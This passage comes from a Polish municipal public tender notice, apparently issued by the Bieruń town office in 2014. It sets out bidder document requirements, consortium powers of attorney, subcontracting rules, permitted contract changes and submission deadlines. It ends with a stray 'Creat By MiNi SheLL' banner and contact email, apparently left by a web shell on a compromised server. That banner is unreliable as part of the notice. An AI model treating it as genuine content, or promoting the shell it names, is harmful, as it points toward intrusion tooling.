Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa wyżej.
2	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
       3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku  
            innych podmiotów , na zasobach których wykonawca polega na zasadach określonych 
            w art.26 ust. 2b ustawy pzp , kopie dokumentów dotyczących odpowiednio wykonawcy lub 
            podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te 
            podmioty.
4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do 
     oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu           zamówienia. 
         Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać w szczególności:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego (wskazanie konkretnych zasobów podmiotu trzeciego, 
            którymi wykonawca będzie dysponował przy realizacji zamówienia),
         -  czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie zobowiązanie wykonane przy 
            realizacji zamówienia ( w realizacji której części zamówienia będzie brał udział podmiot trzeci  
            i w jakiej formie np. podwykonawstwo),
         -  jakiego okresu dotyczy zobowiązanie.
         W sytuacji  gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu          w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
W przypadku, gdy wykonawca polega na zasobach innych podmiotów przy wykazaniu spełnienia          
warunku  wiedzy i doświadczenia, należy wykazać udział tych podmiotów w wykonaniu zamówienia.
     5. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów  dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może    przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku. 
     6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) do oferty należy dołączyć : 
          a) Pełnomocnictwo określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera), jego 
              zakresu działania i uprawnień do reprezentowania wykonawców występujących w 
              postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia 
              umowy. 
Pełnomocnictwo  winno zawierać, w szczególności:
- nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację zamówienia  
i udzielających pełnomocnictwa, 
- nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy, 
- czas trwania ( zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie 
   zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- cel zawarcia ( wspólny udział w przetargu i wspólna realizacja zamówienia publicznego),
- datę udzielenia pełnomocnictwa,
- podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,    
  zgodne z zasadą ich reprezentacji. 
              Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii.
              Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem/ Liderem.
          b) Oświadczenia wymienione w SIWZ pkt. V.A  powinny być złożone w taki sposób, aby 
              warunki , o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.
          c) Dokumenty wymieniony w SIWZ pkt. V B ppkt. 1 i 2  Lista wymaganych dokumentów  powinny 
              być złożone w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy 
              występujący wspólnie spełnili łącznie.
      d) Dokumenty wymienione w SIWZ pkt. V B ppkt. 3, 4 i 5 Listy wymaganych dokumentów,  składa 
           każdy  z wykonawców wchodzących w skład podmiotu występującego wspólnie. 
C. Wykonawca zobowiązany jest do zawarcia w treści oferty informacji w zakresie części zamówienia, 
     która zostanie powierzona podwykonawcom.
       W przypadku braku złożenia informacji w tym zakresie zamawiający uzna, że wykonawca 
       wykona całość zamówienia siłami własnymi,  bez  powierzenia części zamówienia 
       podwykonawcom.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w zakresie:
a) wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie z obowiązującą stawką;
b)  zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem  
wymagań określonych w SIWZ, jakie osoby te powinny spełniać; 
c)  zmiany podwykonawcy lub powierzenia podwykonawcy części zakresu zamówienia w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania oferty;
     Jeżeli zmiana lub rezygnacja podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się , na zasadach określonych w art., 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust.1  ww. ustawy, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia;
d) mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa; 
e)  innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie 
               wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu, Referat Zamówień Publicznych (pokój nr 15, II piętro, Segment A), 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2014 godzina 10:00, miejsce: Urząd Miejski w Bieruniu, Sekretariat (pokój nr 9, I piętro, Segment A), 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com